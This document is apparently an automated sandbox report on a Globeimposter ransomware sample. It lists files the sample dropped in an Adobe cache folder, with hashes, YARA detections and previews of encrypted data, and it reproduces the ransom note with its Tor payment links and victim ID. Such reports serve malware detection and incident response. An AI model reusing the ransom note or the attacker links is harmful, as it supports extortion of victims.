                                                                                                                                                      Preview: S}..d......r/W8....]b..+.|.g&2[.I.. .Dd..p].g.h...d{[)I.k;".Q..E ....izm.].......)..\.7..wF*...m.&.t...'..4..LU...F..l.7.k..>...$z..`...wZH....P{.......J?..G!.g.Ug.F8.e/..../.;...3d<...x.FYZeVl..p.PW.....cm..v..E!teu.......U.....j?...n8...l.9..<Z*.~..c...........?O.\H..W.".H.Jg...G...E.g....&.c.$..a.......w.rO.%...$7.. .Y*..N..l.._...,.o.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.7671539028666885
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:KQOUFg9rmdGub3zK8sevWAVgKTaCB7RZ0cHYIgtyUzAGW:KQOjrmdGk3zCwgck383GW
                                                                                                                                                      MD5:058AB3252CE7965957AB571EE44B0AA3
                                                                                                                                                      SHA1:1EB102ECC55082377D0D8F9D5A73BFA045451007
                                                                                                                                                      SHA-256:03200E907580BBFA61BBFFDFAB5DA49485F68140837248823247C2BFC405BE79
                                                                                                                                                      SHA-512:D2DC8347862EF64DCD47FF36F6C3BF9A9E800E7E4CB02D08F08B335963E185E082D9A20A5679622F481CE6881CB12A38091B630DE3B2E74B0C289D4E4BBF523B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: S}..d......r/W8....]b..+.|.g&2[.I.. .Dd..p].g.h...d{[)I.k;".Q..E ....izm.].......)..\.7..wF*...m.&.t...'..4..LU...F..l.7.k..>...$z..`...wZH....P{.......J?..G!.g.Ug.F8.e/..../.;...3d<...x.FYZeVl..p.PW.....cm..v..E!teu.......U.....j?...n8...l.9..<Z*.~..c...........?O.\H..W.".H.Jg...G...E.g....&.c.$..a.......w.rO.%...$7.. .Y*..N..l.._...,.o.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.762101843911803
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:r1RQk9jWvzK8sevWAVgKTaCB7RZ0cHYIgtyUzo:DjWvzCwgck38B
                                                                                                                                                      MD5:ACF3FC5B8EE10F95C3E57A55CAFB729A
                                                                                                                                                      SHA1:1C7B9EC2DEED1C7C75DD00B2FEF87763F40DD3CF
                                                                                                                                                      SHA-256:6B7707555D9BD15BBEB692B96847787088DBF8A44B92EEF46464AE94E44F72EA
                                                                                                                                                      SHA-512:101DEABCF3205CD809DFA0A45E46854C51B3BE75BD5E2096172CF4722A219BA47B1F334C0C2F75411D2D7AD450DA2A4D41A999599CC0BDD5FB63EBA574AE22C6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....Y_Q.."s.....h(.w.......<..;T.;MG....k!........'. ..n3u...f.L.I....0.:E.G..&...A....}..W..[_.Q"..L..s;S.....:H.E....Z.cR...).f..B<V..P..{.x...m.x[....1..<.]. V.M[...].7..._T9.4..b..-~B.|....YL...{f....pX.}$...r(CG.an.C...Q.G.N...I..n.....zX..+7..g.T.W..X!.5....W..vFX..d..`@.e<.....eit@...y.......;.U.Pu.J5o..N.......?-.W67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.762101843911803
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:r1RQk9jWvzK8sevWAVgKTaCB7RZ0cHYIgtyUzo:DjWvzCwgck38B
                                                                                                                                                      MD5:ACF3FC5B8EE10F95C3E57A55CAFB729A
                                                                                                                                                      SHA1:1C7B9EC2DEED1C7C75DD00B2FEF87763F40DD3CF
                                                                                                                                                      SHA-256:6B7707555D9BD15BBEB692B96847787088DBF8A44B92EEF46464AE94E44F72EA
                                                                                                                                                      SHA-512:101DEABCF3205CD809DFA0A45E46854C51B3BE75BD5E2096172CF4722A219BA47B1F334C0C2F75411D2D7AD450DA2A4D41A999599CC0BDD5FB63EBA574AE22C6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....Y_Q.."s.....h(.w.......<..;T.;MG....k!........'. ..n3u...f.L.I....0.:E.G..&...A....}..W..[_.Q"..L..s;S.....:H.E....Z.cR...).f..B<V..P..{.x...m.x[....1..<.]. V.M[...].7..._T9.4..b..-~B.|....YL...{f....pX.}$...r(CG.an.C...Q.G.N...I..n.....zX..+7..g.T.W..X!.5....W..vFX..d..`@.e<.....eit@...y.......;.U.Pu.J5o..N.......?-.W67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fdd733564de6fbcb_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.756646030045723
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:OAgCv4qLkA7if9q1OzK8sevWAVgKTaCB7RZ0cHYIgtyUzAdf:ezgkRf01OzCwgck3835
                                                                                                                                                      MD5:356E58D7BBEA79E5619C6F02BF7B5CAF
                                                                                                                                                      SHA1:69BECD0D69BBA2B8139F17D72B41EFDA56427B37
                                                                                                                                                      SHA-256:29752DB24B0593F7D54428F9F34246ACBC08B7FD1B5BFD075354988ECEA2BC97
                                                                                                                                                      SHA-512:34626CAEB46E3D2AC9BFF456C3653AAE5F3C53D49CF865EDEBDF184D039A06627208A191F2614721F1E3830717179F220FBDB26231E77BD06B9AC9FDA75FBEBB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .*.......VS.l..|.L...D].J.b...Y?J0../..,...M!...KpA.:)#...x1.eD@.{._.rJ.....9;-WW.EE.F9q..d.nK.'.&7......`).!I6.S.$.}.vl....).d..a4q.<...=....$..=...e........vPnj.:...E...0.+oKh.$U..C.vo.s:...$f&.F=u.w....Q+....~w...v..0QP.3!.)...GatK....\..o.gN.....UK]...=.........#t.q..@.;<7 ... 9.L.8.......2taq.....T.2./..........@.:Mj[..A.i(..^HZ...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fdd733564de6fbcb_0.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.756646030045723
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:OAgCv4qLkA7if9q1OzK8sevWAVgKTaCB7RZ0cHYIgtyUzAdf:ezgkRf01OzCwgck3835
                                                                                                                                                      MD5:356E58D7BBEA79E5619C6F02BF7B5CAF
                                                                                                                                                      SHA1:69BECD0D69BBA2B8139F17D72B41EFDA56427B37
                                                                                                                                                      SHA-256:29752DB24B0593F7D54428F9F34246ACBC08B7FD1B5BFD075354988ECEA2BC97
                                                                                                                                                      SHA-512:34626CAEB46E3D2AC9BFF456C3653AAE5F3C53D49CF865EDEBDF184D039A06627208A191F2614721F1E3830717179F220FBDB26231E77BD06B9AC9FDA75FBEBB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .*.......VS.l..|.L...D].J.b...Y?J0../..,...M!...KpA.:)#...x1.eD@.{._.rJ.....9;-WW.EE.F9q..d.nK.'.&7......`).!I6.S.$.}.vl....).d..a4q.<...=....$..=...e........vPnj.:...E...0.+oKh.$U..C.vo.s:...$f&.F=u.w....Q+....~w...v..0QP.3!.)...GatK....\..o.gN.....UK]...=.........#t.q..@.;<7 ... 9.L.8.......2taq.....T.2./..........@.:Mj[..A.i(..^HZ...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):1184
                                                                                                                                                      Entropy (8bit):5.805041665575474
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:6kFo1vaJkMZ3xzK8sevWAVgKTaCB7RZ0cHYIgtyUz2P:q1oVZ3xzCwgck38f
                                                                                                                                                      MD5:5AFFBB4EFD3CF2E8E575DCA348729AEA
                                                                                                                                                      SHA1:FFE06D2435D1BE95BD75C2DB55587DBFEB4BFA87
                                                                                                                                                      SHA-256:8A170C658F420C2F6A0DD198E94B6F3A09A62EE94C11F75CAA84E12B2991E2DA
                                                                                                                                                      SHA-512:8C3F3927814B5F91FDE13A34414B2C5F95DF4E113C7EC1A45AD4906BABCA7B323216E7F6CADD95B5E73AAA0BCF253576716B86CAC82E3A59A22A16FBD92629A5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .. .C.d.X.K.3....... ...D......tRmX}.,...P..'......L{.].,Z^p...+...S..4^...#...Y...a...@.;...L...(..T...h.....C.V.?n$.P%.`.w.8>........?..s.h.Y+.,...U.....".54%....6*..\...+~.y.6w..vq....O..<1.c.)..... <.X...qj......MK...6..~...n'B.Y.ED.|8]5%#.!..&9g3...5..-.S..\|.."C[d3....?......$.S'.`.Tp..R6p5.{8..s}.\.?..;Z8-..~.;.;.B....j.b.P_|.jx....Z^...l...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):976
                                                                                                                                                      Entropy (8bit):5.040473157009372
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:kYOw407nl/zK8sevWAVgKTaCB7RZ0cHYIgtyUzsl:D/7l/zCwgck38B
                                                                                                                                                      MD5:5F6FCD4558614B39EE63E2A90B0F3F08
                                                                                                                                                      SHA1:D43085ECB482A60559A5047DCAD5FB32694707CB
                                                                                                                                                      SHA-256:44CB1F9188CE394A7FF3FEC18729E29B5565ABDCEABE3D2FA749E18A805F04AD
                                                                                                                                                      SHA-512:4839AD7F5768286CE66058D616568373A2BE0E5157A860F7EFEFF111510115DE78A2E8760229CFA2B57832E90F9D4F0D4ED080C081F745D74C9B97E8AA9AE776
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: .e.(...>_9o.`e..O.o..t.j~..;..^D.y....x.5dM....U..ED..}.U[..n5....W.7c.|..I.sV`..Q.U ...01x...=F.&..uY..Z..........l.q#u....}...M...Q..]..w].......B.K~|..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74.t<.....4..7..7.7".*...r.<0..VI.?{-q.2...L...
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\read-me.txt, Author: Joe Security
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1936
                                                                                                                                                      Entropy (8bit):6.933514624867821
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:9KYMtDTcofiISoaQqXXCsc41AlzCwgck38p:ghc3hoaqsjgzTEG
                                                                                                                                                      MD5:0C01502A06B1513155BEFF460E8AEB5C
                                                                                                                                                      SHA1:CAE6D36503D4F8F27DE43EE8790984DDD165C325
                                                                                                                                                      SHA-256:29AE18D97F4F74DB0174C349A07A32391C28DF303D2714DA33B787D5B0683BC3
                                                                                                                                                      SHA-512:9817B6CBF68335CDAEA61E78603F0225E6088A8AC4125777768AFBABD1A5E29359C0236A54EB95E4E76EC4BE8EA87CD8B8746D8805C3C82C8FD76B648AE6FA4D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..Sb#.~.Q2.......(;.5|....?A..#.'.6..6%..D_0..l..3.w.kA.]`rQ.r.Z..*U..%v......4..1....D....f{.UA.5...o..).G.tl..u.q...^.T..15...4E2D.o......<.&...`{.y.b..- ..1...$.gS,U...,.LF..0...vA..(...o..9.zi...:.x.....J6p...W...=...H...)....5y.x-.C... x.Y....C...|...D.7...MD0\K..P~.. -b.*O+L.A..b.....M[.P..E.?..{r)X3...I..A.m..N.Jo...&...$...FO-".E.h"..Id0JZ.....?.R..!.G .K*1.....3.a....4..e...jSX...r.....T.u+:.9...>.@..o....*.....dE~..^a..4...k..*...h......[|.T.:~..C.<Y.hE..F.h+Q.....3.0tJ.7...f..m.m.V$.S....T.;..ZO..)rMb...qb..|.....Z.3...,{.46.ovYv..)\....V.$.U.p.K.b{.~...S...uh.K..L.oK.Z...@.a9.R..9.G7.X..d\R..y.AeN...x....F.}.]]...)..Zy.......~.nsG .8..s.F..e.bn..N......T......KycP...........%y....7...h&.T.;m.....+...FWeR.iX...".K.#.[...E%#..G#.?4......gO\...'u....c.qP.?..[rR...n.+.DWx$/.UM.;.4.Bg, ...L...v..X...vRds.@.H.7...V.D9/..e....3..ju..|.mXWySh...9.../.Y...9.....)..`.V..x.q...4...........8..Yz...d1.....W.Z5..g....S(.H...H.:.0...1c.*.. .P..p
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, Author: Joe Security
